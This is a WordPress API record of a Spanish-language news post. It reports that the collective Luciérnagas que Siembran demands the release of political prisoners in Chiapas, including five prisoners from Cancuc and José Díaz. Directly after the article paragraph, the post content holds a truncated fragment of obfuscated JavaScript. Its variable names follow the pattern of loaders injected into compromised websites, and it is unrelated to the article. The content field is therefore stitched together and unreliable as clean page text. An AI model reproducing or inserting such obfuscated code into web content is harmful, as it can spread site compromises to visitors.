{"id":14912,"date":"2024-04-03T03:26:12","date_gmt":"2024-04-03T03:26:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14912"},"modified":"2024-04-03T03:26:13","modified_gmt":"2024-04-03T03:26:13","slug":"colectivo-luciernagas-se-solidariza-con-presos-politicos-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14912","title":{"rendered":"Colectivo Luci\u00e9rnagas se solidariza con presos pol\u00edticos de Chiapas"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"716\" height=\"411\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240402-WA0018.jpg\" alt=\"\" class=\"wp-image-14913\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240402-WA0018.jpg 716w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240402-WA0018-300x172.jpg 300w\" sizes=\"auto, (max-width: 716px) 100vw, 716px\" \/><\/figure>\n<\/blockquote>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal <\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.-  El 02 de Abril del 2024. Colectivo Luci\u00e9rnagas que Siembran alz\u00f3 su voz en solidaridad con los presos pol\u00edticos de Chiapas, quienes son defensores valientes de la tierra y el territorio. Por lo que exigen de manera en\u00e9rgica su liberaci\u00f3n inmediata e incondicional, denunciando que son rehenes del Estado Mexicano.Entre los llamamientos del Colectivo, se destaca la demanda de libertad para los 5 presos de Cancuc y Jos\u00e9 D\u00edaz, base de apoyo zapatista, quienes han sido encarcelados de manera injusta. &#8220;En un contexto donde se evidencia la criminalizaci\u00f3n de las personas defensoras del territorio, denuncian la fabricaci\u00f3n de pruebas por parte de las autoridades&#8221;.&#8221;Este gesto de solidaridad refleja el compromiso del Colectivo Luci\u00e9rnagas que Siembran con la justicia y la defensa de los derechos humanos&#8221;. Y finalmente instan a la sociedad a unirse en esta lucha por la libertad y la dignidad de quienes son perseguidos por defender sus tierras y comunidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- El 02 de Abril del 2024. Colectivo Luci\u00e9rnagas que Siembran alz\u00f3 su voz en solidaridad con los presos pol\u00edticos de Chiapas, quienes son defensores valientes de la tierra y el territorio. Por lo que exigen de manera en\u00e9rgica su liberaci\u00f3n inmediata e incondicional, denunciando que son rehenes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14913,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14912","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14912","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14912"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14912\/revisions"}],"predecessor-version":[{"id":14914,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14912\/revisions\/14914"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14913"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14912"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14912"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14912"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}